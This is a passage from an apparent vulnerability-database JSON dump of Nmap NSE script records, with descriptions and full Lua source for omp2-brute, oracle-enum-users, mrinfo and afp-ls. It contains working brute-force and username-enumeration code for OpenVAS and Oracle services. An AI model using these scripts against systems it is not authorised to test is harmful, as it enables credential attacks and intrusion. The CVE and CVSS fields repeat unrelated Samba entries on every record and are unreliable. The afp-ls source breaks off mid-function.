"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-03-10T03:09:39", "id": "NMAP:OMP2-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/omp2-brute.html", "sourceData": "local brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal omp2 = require \"omp2\"\nlocal shortport = require \"shortport\"\n\ndescription = [[\nPerforms brute force password auditing against the OpenVAS manager using OMPv2.\n]]\n\n---\n-- @usage\n-- nmap -p 9390 --script omp2-brute <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 9390/tcp open openvas syn-ack\n-- | omp2-brute:\n-- | Accounts\n-- |_ admin:secret => Valid credentials\n--\n\nauthor = \"Henri Doreau\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"brute\", \"intrusive\"}\n\n\nportrule = shortport.port_or_service(9390, \"openvas\")\n\n\nDriver = {\n new = function(self, host, port)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.session = omp2.Session:new(brute.new_socket())\n return o\n end,\n\n --- Connects to the OpenVAS Manager\n --\n -- @return status boolean for connection success/failure\n -- @return err string describing the error on failure\n connect = function(self)\n return self.session:connect(self.host, self.port)\n end,\n\n --- Closes connection\n --\n -- @return status boolean for closing success/failure\n disconnect = function(self)\n return self.session:close()\n end,\n\n --- Attempts to login the the OpenVAS Manager using a given username/password\n -- couple. Store the credentials in the registry on success.\n --\n -- @param username string containing the login username\n -- @param password string containing the login password\n -- @return status boolean for login success/failure\n -- @return err string describing the error on failure\n login = function(self, username, password)\n if self.session:authenticate(username, password) then\n -- store the account for possible future use\n omp2.add_account(self.host, username, password)\n return true, creds.Account:new(username, password, creds.State.VALID)\n else\n return false, brute.Error:new(\"login failed\")\n end\n end,\n\n}\n\naction = function(host, port)\n local engine = brute.Engine:new(Driver, host, port)\n engine.options.script_name = SCRIPT_NAME\n local status, result = engine:start()\n return result\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:39:06", "description": "Attempts to enumerate valid Oracle user names against unpatched Oracle 11g servers (this bug was fixed in Oracle's October 2009 Critical Patch Update).\n\n## Script Arguments \n\n#### oracle-enum-users.sid \n\nthe instance against which to attempt user enumeration\n\n#### tns.sid \n\nSee the documentation for the [tns](<../lib/tns.html#script-args>) library. \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 <host>\n \n If no userdb is supplied the default userlist is used\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 1521/tcp open oracle syn-ack\n | oracle-enum-users:\n | haxxor is a valid user account\n | noob is a valid user account\n |_ patrik is a valid user account\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [tns](<../lib/tns.html>)\n * [unpwdb](<../lib/unpwdb.html>)\n * [rand](<../lib/rand.html>)\n * [openssl](<../lib/openssl.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-08-19T23:09:32", "type": "nmap", "title": "oracle-enum-users NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-08T17:07:06", "id": "NMAP:ORACLE-ENUM-USERS.NSE", "href": "https://nmap.org/nsedoc/scripts/oracle-enum-users.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal tns = require \"tns\"\nlocal unpwdb = require \"unpwdb\"\nlocal rand = require \"rand\"\n\nlocal openssl = stdnse.silent_require \"openssl\"\n\ndescription = [[\nAttempts to enumerate valid Oracle user names against unpatched Oracle 11g\nservers (this bug was fixed in Oracle's October 2009 Critical Patch Update).\n]]\n\n---\n-- @usage\n-- nmap --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 <host>\n--\n-- If no userdb is supplied the default userlist is used\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 1521/tcp open oracle syn-ack\n-- | oracle-enum-users:\n-- | haxxor is a valid user account\n-- | noob is a valid user account\n-- |_ patrik is a valid user account\n--\n-- @args oracle-enum-users.sid the instance against which to attempt user\n-- enumeration\n\n-- Version 0.3\n\n-- Created 12/07/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n-- Revised 21/07/2010 - v0.2 - revised to work with patched systems <patrik>\n-- Revised 21/07/2010 - v0.3 - removed references to smb in get_random_string\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"auth\"}\n\n\nportrule = shortport.port_or_service(1521, 'oracle-tns' )\n\nlocal function checkAccount( host, port, user )\n\n local helper = tns.Helper:new( host, port, nmap.registry.args['oracle-enum-users.sid'] )\n local status, data = helper:Connect()\n local tnscomm, auth\n local auth_options = tns.AuthOptions:new()\n\n\n if ( not(status) ) then\n return false, data\n end\n\n -- A bit ugly, the helper should probably provide a getSocket function\n tnscomm = tns.Comm:new( helper.tnssocket )\n\n status, auth = tnscomm:exchTNSPacket( tns.Packet.PreAuth:new( user, auth_options, helper.os ) )\n if ( not(status) ) then\n return false, auth\n end\n helper:Close()\n\n return true, auth[\"AUTH_VFR_DATA\"]\nend\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function( host, port )\n\n local known_good_accounts = { \"system\", \"sys\", \"dbsnmp\", \"scott\" }\n\n local status, salt\n local count = 0\n local result = {}\n local usernames\n\n if ( not( nmap.registry.args['oracle-enum-users.sid'] ) and not( nmap.registry.args['tns.sid'] ) ) then\n return fail(\"Oracle instance not set (see oracle-enum-users.sid or tns.sid)\")\n end\n\n status, usernames = unpwdb.usernames()\n if( not(status) ) then\n return fail(\"Failed to load the usernames dictionary\")\n end\n\n -- Check for some known good accounts\n for _, user in ipairs( known_good_accounts ) do\n status, salt = checkAccount(host, port, user)\n if( not(status) ) then return salt end\n if ( salt ) then\n count = count + #salt\n end\n end\n\n -- did we atleast get a single salt back?\n if ( count < 20 ) then\n return fail(\"None of the known accounts were detected (oracle < 11g)\")\n end\n\n -- Check for some known bad accounts\n count = 0\n for i=1, 10 do\n local user = rand.random_string(10,\n \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_\")\n status, salt = checkAccount(host, port, user)\n if( not(status) ) then return salt end\n if ( salt ) then\n count = count + #salt\n end\n end\n\n -- It's unlikely that we hit 3 random combinations as valid users\n if ( count > 60 ) then\n return fail((\"%d of %d random accounts were detected (Patched Oracle 11G or Oracle 11G R2)\"):format(count/20, 10))\n end\n\n for user in usernames do\n status, salt = checkAccount(host, port, user)\n if ( not(status) ) then return salt end\n if ( salt and #salt == 20 ) then\n table.insert( result, (\"%s is a valid user account\"):format(user))\n end\n end\n\n if ( #result == 0 ) then\n table.insert( result, \"Failed to find any valid user accounts\")\n end\n\n return stdnse.format_output(true, result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:40:42", "description": "Queries targets for multicast routing information. \n\nThis works by sending a DVMRP Ask Neighbors 2 request to the target and listening for DVMRP Neighbors 2 responses that are sent back and which contain local addresses and the multicast neighbors on each interface of the target. If no specific target is specified, the request will be sent to the 224.0.0.1 All Hosts multicast address. \n\nThis script is similar somehow to the mrinfo utility included with Windows and Cisco IOS.\n\n## Script Arguments \n\n#### mrinfo.target \n\nHost to which the request is sent. If not set, the request will be sent to `224.0.0.1`.\n\n#### mrinfo.timeout \n\nTime to wait for responses. Defaults to `5s`.\n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script mrinfo\n nmap --script mrinfo -e eth1\n nmap --script mrinfo --script-args 'mrinfo.target=172.16.0.4'\n \n\n## Script Output \n \n \n Pre-scan script results:\n | mrinfo:\n | Source: 224.0.0.1\n | Version 12.4\n | Local address: 172.16.0.2\n | Neighbor: 172.16.0.4\n | Neighbor: 172.16.0.3\n | Local address: 172.17.0.1\n | Neighbor: 172.17.0.2\n | Local address: 172.18.0.1\n | Neighbor: 172.18.0.2\n | Source: 224.0.0.1\n | Version 12.4\n | Local address: 172.16.0.4\n | Neighbor: 172.16.0.3\n | Neighbor: 172.16.0.2\n | Local address: 172.17.0.2\n | Neighbor: 172.17.0.1\n | Source: 224.0.0.1\n | Version 12.4\n | Local address: 172.16.0.3\n | Neighbor: 172.16.0.4\n | Neighbor: 172.16.0.2\n | Local address: 172.18.0.2\n | Neighbor: 172.18.0.1\n |_ Use the newtargets script-arg to add the responses as targets\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [packet](<../lib/packet.html>)\n * [ipOps](<../lib/ipOps.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [target](<../lib/target.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-08-03T22:58:29", "type": "nmap", "title": "mrinfo NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-08T17:07:01", "id": "NMAP:MRINFO.NSE", "href": "https://nmap.org/nsedoc/scripts/mrinfo.html", "sourceData": "local nmap = require \"nmap\"\nlocal packet = require \"packet\"\nlocal ipOps = require \"ipOps\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal target = require \"target\"\nlocal table = require \"table\"\n\n\ndescription = [[\nQueries targets for multicast routing information.\n\nThis works by sending a DVMRP Ask Neighbors 2 request to the target and\nlistening for DVMRP Neighbors 2 responses that are sent back and which contain\nlocal addresses and the multicast neighbors on each interface of the target. If\nno specific target is specified, the request will be sent to the 224.0.0.1 All\nHosts multicast address.\n\nThis script is similar somehow to the mrinfo utility included with Windows and\nCisco IOS.\n]]\n\n---\n-- @args mrinfo.target Host to which the request is sent. If not set, the\n-- request will be sent to <code>224.0.0.1</code>.\n--\n-- @args mrinfo.timeout Time to wait for responses.\n-- Defaults to <code>5s</code>.\n--\n--@usage\n-- nmap --script mrinfo\n-- nmap --script mrinfo -e eth1\n-- nmap --script mrinfo --script-args 'mrinfo.target=172.16.0.4'\n--\n--@output\n-- Pre-scan script results:\n-- | mrinfo:\n-- | Source: 224.0.0.1\n-- | Version 12.4\n-- | Local address: 172.16.0.2\n-- | Neighbor: 172.16.0.4\n-- | Neighbor: 172.16.0.3\n-- | Local address: 172.17.0.1\n-- | Neighbor: 172.17.0.2\n-- | Local address: 172.18.0.1\n-- | Neighbor: 172.18.0.2\n-- | Source: 224.0.0.1\n-- | Version 12.4\n-- | Local address: 172.16.0.4\n-- | Neighbor: 172.16.0.3\n-- | Neighbor: 172.16.0.2\n-- | Local address: 172.17.0.2\n-- | Neighbor: 172.17.0.1\n-- | Source: 224.0.0.1\n-- | Version 12.4\n-- | Local address: 172.16.0.3\n-- | Neighbor: 172.16.0.4\n-- | Neighbor: 172.16.0.2\n-- | Local address: 172.18.0.2\n-- | Neighbor: 172.18.0.1\n-- |_ Use the newtargets script-arg to add the responses as targets\n--\n\n\nauthor = \"Hani Benhabiles\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"safe\", \"broadcast\"}\n\n\nprerule = function()\n if nmap.address_family() ~= 'inet' then\n stdnse.verbose1(\"is IPv4 only.\")\n return false\n end\n if not nmap.is_privileged() then\n stdnse.verbose1(\"not running for lack of privileges.\")\n return false\n end\n return true\nend\n\n-- Parses a DVMRP Ask Neighbor 2 raw data and returns\n-- a structured response.\n-- @param data raw data.\nlocal mrinfoParse = function(data)\n local index, address, neighbor\n local response = {}\n\n -- first byte should be IGMP type == 0x13 (DVMRP)\n if data:byte(1) ~= 0x13 then return end\n\n -- DVMRP Code\n response.code,\n -- Checksum\n response.checksum,\n -- Capabilities (Skip one reserved byte)\n response.capabilities,\n -- Major and minor version\n response.minver,\n response.majver, index = string.unpack(\">B I2 x B B B\", data, 2)\n response.addresses = {}\n -- Iterate over target local addresses (interfaces)\n while index < #data do\n if data:byte(index) == 0x00 then break end\n address = {}\n -- Local address\n address.ip,\n -- Link metric\n address.metric,\n -- Threshold\n address.threshold,\n -- Flags\n address.flags,\n -- Number of neighbors\n address.ncount, index = string.unpack(\">c4BBBB\", data, index)\n address.ip = ipOps.str_to_ip(address.ip)\n\n address.neighbors = {}\n -- Iterate over neighbors\n for i = 1, address.ncount do\n neighbor, index = string.unpack(\">c4\", data, index)\n table.insert(address.neighbors, ipOps.str_to_ip(neighbor))\n end\n table.insert(response.addresses, address)\n end\n return response\nend\n\n-- Listens for DVMRP Ask Neighbors 2 responses\n--@param interface Network interface to listen on.\n--@param timeout Time to listen for a response.\n--@param responses table to insert responses into.\nlocal mrinfoListen = function(interface, timeout, responses)\n local condvar = nmap.condvar(responses)\n local start = nmap.clock_ms()\n local listener = nmap.new_socket()\n local p, mrinfo_raw, status, l3data, response, _\n\n -- IGMP packets that are sent to our host\n local filter = 'ip proto 2 and dst host ' .. interface.address\n listener:set_timeout(100)\n listener:pcap_open(interface.device, 1024, true, filter)\n\n while (nmap.clock_ms() - start) < timeout do\n status, _, _, l3data = listener:pcap_receive()\n if status then\n p = packet.Packet:new(l3data, #l3data)\n mrinfo_raw = string.sub(l3data, p.ip_hl*4 + 1)\n if p then\n -- Check that IGMP Type == DVMRP (0x13) and DVMRP code == Neighbor 2 (0x06)\n if mrinfo_raw:byte(1) == 0x13 and mrinfo_raw:byte(2) == 0x06 then\n response = mrinfoParse(mrinfo_raw)\n if response then\n response.srcip = p.ip_src\n table.insert(responses, response)\n end\n end\n end\n end\n end\n condvar(\"signal\")\nend\n\n-- Function that generates a raw DVMRP Ask Neighbors 2 request.\nlocal mrinfoRaw = function()\n local mrinfo_raw = string.pack(\">BB I2 I2 BB\",\n 0x13, -- Type: DVMRP\n 0x05, -- Code: Ask Neighbor v2\n 0x0000, -- Checksum: Calculated later\n 0x000a, -- Reserved\n -- Version == Cisco IOS 12.4\n 0x04, -- Minor version: 4\n 0x0c) -- Major version: 12\n\n -- Calculate checksum\n mrinfo_raw = mrinfo_raw:sub(1,2) .. string.pack(\">I2\", packet.in_cksum(mrinfo_raw)) .. mrinfo_raw:sub(5)\n\n return mrinfo_raw\nend\n\n-- Function that sends a DVMRP query.\n--@param interface Network interface to use.\n--@param dstip Destination IP to send to.\nlocal mrinfoQuery = function(interface, dstip)\n local mrinfo_packet, sock, eth_hdr\n local srcip = interface.address\n\n local mrinfo_raw = mrinfoRaw()\n local ip_raw = stdnse.fromhex( \"45c00040ed780000400218bc0a00c8750a00c86b\") .. mrinfo_raw\n mrinfo_packet = packet.Packet:new(ip_raw, ip_raw:len())\n mrinfo_packet:ip_set_bin_src(ipOps.ip_to_str(srcip))\n mrinfo_packet:ip_set_bin_dst(ipOps.ip_to_str(dstip))\n mrinfo_packet:ip_set_len(ip_raw:len())\n if dstip == \"224.0.0.1\" then\n -- Doesn't affect results, but we should respect RFC 3171 :)\n mrinfo_packet:ip_set_ttl(1)\n end\n mrinfo_packet:ip_count_checksum()\n\n sock = nmap.new_dnet()\n if dstip == \"224.0.0.1\" then\n sock:ethernet_open(interface.device)\n -- Ethernet IPv4 multicast, our ethernet address and packet type IP\n eth_hdr = \"\\x01\\x00\\x5e\\x00\\x00\\x01\" .. interface.mac .. \"\\x08\\x00\"\n sock:ethernet_send(eth_hdr .. mrinfo_packet.buf)\n sock:ethernet_close()\n else\n sock:ip_open()\n sock:ip_send(mrinfo_packet.buf, dstip)\n sock:ip_close()\n end\nend\n\n-- Returns the network interface used to send packets to a target host.\n--@param target host to which the interface is used.\n--@return interface Network interface used for target host.\nlocal getInterface = function(target)\n -- First, create dummy UDP connection to get interface\n local sock = nmap.new_socket()\n local status, err = sock:connect(target, \"12345\", \"udp\")\n if not status then\n stdnse.verbose1(\"%s\", err)\n return\n end\n local status, address, _, _, _ = sock:get_info()\n if not status then\n stdnse.verbose1(\"%s\", err)\n return\n end\n for _, interface in pairs(nmap.list_interfaces()) do\n if interface.address == address then\n return interface\n end\n end\nend\n\naction = function()\n local timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. \".timeout\"))\n timeout = (timeout or 5) * 1000\n local target = stdnse.get_script_args(SCRIPT_NAME .. \".target\") or \"224.0.0.1\"\n local responses = {}\n local interface, result\n\n interface = nmap.get_interface()\n if interface then\n interface = nmap.get_interface_info(interface)\n else\n interface = getInterface(target)\n end\n if not interface then\n return stdnse.format_output(false, (\"Couldn't get interface for %s\"):format(target))\n end\n\n stdnse.debug1(\"will send to %s via %s interface.\", target, interface.shortname)\n\n -- Thread that listens for responses\n stdnse.new_thread(mrinfoListen, interface, timeout, responses)\n\n -- Send request after small wait to let Listener start\n stdnse.sleep(0.1)\n mrinfoQuery(interface, target)\n local condvar = nmap.condvar(responses)\n condvar(\"wait\")\n\n if #responses > 0 then\n local output, ifoutput = {}\n for _, response in pairs(responses) do\n result = {}\n result.name = \"Source: \" .. response.srcip\n table.insert(result, (\"Version %s.%s\"):format(response.majver, response.minver))\n for _, address in pairs(response.addresses) do\n ifoutput = {}\n ifoutput.name = \"Local address: \" .. address.ip\n for _, neighbor in pairs(address.neighbors) do\n if target.ALLOW_NEW_TARGETS then target.add(neighbor) end\n table.insert(ifoutput, \"Neighbor: \" .. neighbor)\n end\n table.insert(result, ifoutput)\n end\n table.insert(output, result)\n end\n if not target.ALLOW_NEW_TARGETS then\n table.insert(output,\"Use the newtargets script-arg to add the results as targets\")\n end\n return stdnse.format_output(true, output)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:43", "description": "Attempts to get useful information about files from AFP volumes. The output is intended to resemble the output of `ls`.\n\n## Script Arguments \n\n#### afp.password, afp.username \n\nSee the documentation for the [afp](<../lib/afp.html#script-args>) library. \n\n#### ls.checksum, ls.empty, ls.errors, ls.human, ls.maxdepth, ls.maxfiles \n\nSee the documentation for the [ls](<../lib/ls.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sS -sV -p 548 --script=afp-ls target\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 548/tcp open afp syn-ack\n | afp-ls:\n | Information retrieved as patrik\n | Volume Macintosh HD\n | maxfiles limit reached (10)\n | PERMISSION UID GID SIZE TIME FILENAME\n | -rw-r--r-- 501 80 15364 2010-06-13 17:52 .DS_Store\n | ---------- 0 80 0 2009-10-05 07:42 .file\n | drwx------ 501 20 0 2009-11-04 17:28 .fseventsd\n | -rw------- 0 0 393216 2010-06-14 01:49 .hotfiles.btree\n | drwx------ 0 80 0 2009-11-04 18:19 .Spotlight-V100\n | d-wx-wx-wx 0 80 0 2009-11-04 18:25 .Trashes\n | drwxr-xr-x 0 0 0 2009-05-18 21:29 .vol\n | drwxrwxr-x 0 80 0 2009-04-28 00:06 Applications\n | drwxr-xr-x 0 0 0 2009-05-18 21:43 bin\n | drwxr-xr-x 501 80 0 2010-08-10 22:55 bundles\n |\n | Volume Patrik Karlsson's Public Folder\n | PERMISSION UID GID SIZE TIME FILENAME\n | -rw------- 501 20 6148 2010-12-27 23:45 .DS_Store\n | -rw-r--r-- 501 20 0 2007-07-24 21:17 .localized\n | drwx-wx-wx 501 20 0 2009-06-19 04:01 Drop Box\n |\n | Volume patrik\n | maxfiles limit reached (10)\n | PERMISSION UID GID SIZE TIME FILENAME\n | -rw------- 501 20 11281 2010-06-14 22:51 .bash_history\n | -rw-r--r-- 501 20 33 2011-01-19 20:11 .bashrc\n | -rw------- 501 20 3 2007-07-24 21:17 .CFUserTextEncoding\n | drwx------ 501 20 0 2010-09-12 14:52 .config\n | drwx------ 501 20 0 2010-09-12 12:29 .cups\n | -rw-r--r-- 501 20 15364 2010-06-13 18:34 .DS_Store\n | drwxr-xr-x 501 20 0 2010-09-12 14:13 .fontconfig\n | -rw------- 501 20 102 2010-06-14 01:46 .lesshst\n | -rw-r--r-- 501 20 241 2010-06-14 01:45 .profile\n | -rw------- 501 20 218 2010-09-12 16:35 .recently-used.xbel\n |_\n \n\n## Requires \n\n * [afp](<../lib/afp.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [ls](<../lib/ls.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-04-05T08:31:34", "type": "nmap", "title": "afp-ls NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-08-31T00:25:09", "id": "NMAP:AFP-LS.NSE", "href": "https://nmap.org/nsedoc/scripts/afp-ls.html", "sourceData": "local afp = require \"afp\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal ls = require \"ls\"\n\ndescription = [[\nAttempts to get useful information about files from AFP volumes.\nThe output is intended to resemble the output of <code>ls</code>.\n]]\n\n---\n--\n-- @usage\n-- nmap -sS -sV -p 548 --script=afp-ls target\n--\n-- @output\n-- PORT STATE SERVICE\n-- 548/tcp open afp syn-ack\n-- | afp-ls:\n-- | Information retrieved as patrik\n-- | Volume Macintosh HD\n-- | maxfiles limit reached (10)\n-- | PERMISSION UID GID SIZE TIME FILENAME\n-- | -rw-r--r-- 501 80 15364 2010-06-13 17:52 .DS_Store\n-- | ---------- 0 80 0 2009-10-05 07:42 .file\n-- | drwx------ 501 20 0 2009-11-04 17:28 .fseventsd\n-- | -rw------- 0 0 393216 2010-06-14 01:49 .hotfiles.btree\n-- | drwx------ 0 80 0 2009-11-04 18:19 .Spotlight-V100\n-- | d-wx-wx-wx 0 80 0 2009-11-04 18:25 .Trashes\n-- | drwxr-xr-x 0 0 0 2009-05-18 21:29 .vol\n-- | drwxrwxr-x 0 80 0 2009-04-28 00:06 Applications\n-- | drwxr-xr-x 0 0 0 2009-05-18 21:43 bin\n-- | drwxr-xr-x 501 80 0 2010-08-10 22:55 bundles\n-- |\n-- | Volume Patrik Karlsson's Public Folder\n-- | PERMISSION UID GID SIZE TIME FILENAME\n-- | -rw------- 501 20 6148 2010-12-27 23:45 .DS_Store\n-- | -rw-r--r-- 501 20 0 2007-07-24 21:17 .localized\n-- | drwx-wx-wx 501 20 0 2009-06-19 04:01 Drop Box\n-- |\n-- | Volume patrik\n-- | maxfiles limit reached (10)\n-- | PERMISSION UID GID SIZE TIME FILENAME\n-- | -rw------- 501 20 11281 2010-06-14 22:51 .bash_history\n-- | -rw-r--r-- 501 20 33 2011-01-19 20:11 .bashrc\n-- | -rw------- 501 20 3 2007-07-24 21:17 .CFUserTextEncoding\n-- | drwx------ 501 20 0 2010-09-12 14:52 .config\n-- | drwx------ 501 20 0 2010-09-12 12:29 .cups\n-- | -rw-r--r-- 501 20 15364 2010-06-13 18:34 .DS_Store\n-- | drwxr-xr-x 501 20 0 2010-09-12 14:13 .fontconfig\n-- | -rw------- 501 20 102 2010-06-14 01:46 .lesshst\n-- | -rw-r--r-- 501 20 241 2010-06-14 01:45 .profile\n-- | -rw------- 501 20 218 2010-09-12 16:35 .recently-used.xbel\n-- |_\n--\n-- @xmloutput\n-- <table key=\"volumes\">\n-- <table>\n-- <elem key=\"volume\">Storage01</elem>\n-- <table key=\"files\">\n-- <table>\n-- <elem key=\"permission\">drwx------</elem>\n-- <elem key=\"uid\">0</elem>\n-- <elem key=\"gid\">100</elem>\n-- <elem key=\"size\">0</elem>\n-- <elem key=\"time\">2015-06-26 17:17</elem>\n-- <elem key=\"filename\">Backups</elem>\n-- </table>\n-- <table>\n-- <elem key=\"permission\">drwxr-xr-x</elem>\n-- <elem key=\"uid\">0</elem>\n-- <elem key=\"gid\">37</elem>\n-- <elem key=\"size\">0</elem>\n-- <elem key=\"time\">2015-06-19 06:36</elem>\n-- <elem key=\"filename\">Network Trash Folder</elem>\n-- </table>\n-- <table>\n-- <elem key=\"permission\">drwxr-xr-x</elem>\n-- <elem key=\"uid\">0</elem>\n-- <elem key=\"gid\">37</elem>\n-- <elem key=\"size\">0</elem>\n-- <elem key=\"time\">2015-06-19 06:36</elem>\n-- <elem key=\"filename\">Temporary Items</elem>\n-- </table>\n-- </table>\n-- </table>\n-- </table>\n-- <table key=\"info\">\n-- <elem>information retrieved as nil</elem>\n-- </table>\n-- <table key=\"total\">\n-- <elem key=\"files\">3</elem>\n-- <elem key=\"bytes\">0</elem>\n-- </table>\n\n-- Version 0.2\n-- Created 04/03/2011 - v0.1 - created by Patrik Karlsson\n-- Modified 08/02/2020 - v0.2 - replaced individual date/size/ownership calls\n-- with direct sourcing from the output of\n-- afp.Helper.Dir\n\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\ndependencies = {\"afp-brute\"}\n\nportrule = shortport.port_or_service(548, {\"afp\"})\n\naction = function(host, port)\n\n local afpHelper = afp.Helper:new()\n local args = nmap.registry.args\n local users = nmap.registry.afp or { ['nil'] = 'nil' }\n local maxfiles = ls.config(\"maxfiles\")\n local output = ls.new_listing()\n\n if ( args['afp.username'] ) then\n users = {}\n users[args['afp.username']] = args['afp.password']\n end\n\n for username, password in pairs(users) do\n\n local status, response = afpHelper:OpenSession(host, port)\n if ( not status ) then\n stdnse.debug1(\"%s\", response)\n return\n end\n\n -- if we have a username attempt to authenticate as the user\n -- Attempt to use No User Authentication?\n if ( username ~= 'nil' ) then\n status, response = afpHelper:Login(username, password)\n else\n status, response = afpHelper:Login()\n end\n\n if ( not status ) then\n stdnse.debug1(\"Login failed\")\n stdnse.debug3(\"Login error: %s\", response)\n return\n end\n\n local vols\n status, vols = afpHelper:ListShares()\n\n if status then\n for _, vol in ipairs( vols ) do\n local status, tbl = afpHelper:Dir( vol )\n if ( not(status) ) then\n ls.report_error(output, (\"ERROR: Failed to list the contents of %s\"):format(vol))\n else\n ls.new_vol(output, vol, true)\n for _, item in ipairs(tbl[1]) do\n if item and item.name then\n if not (item.privs and item.create) then\n ls.report_error(output, (\"ERROR: Failed to retrieve file details for %/%s\"):format(vol, item.name))\n else\n local continue = ls.add_file(output, {\n item.privs, item.uid, item.gid,\n item.fsize, item.create, item.name\n })\n if not continue then\n ls.report_info(output, (\"maxfiles limit reached (%d)\"):format(maxfiles))\n break\n end\n end\n 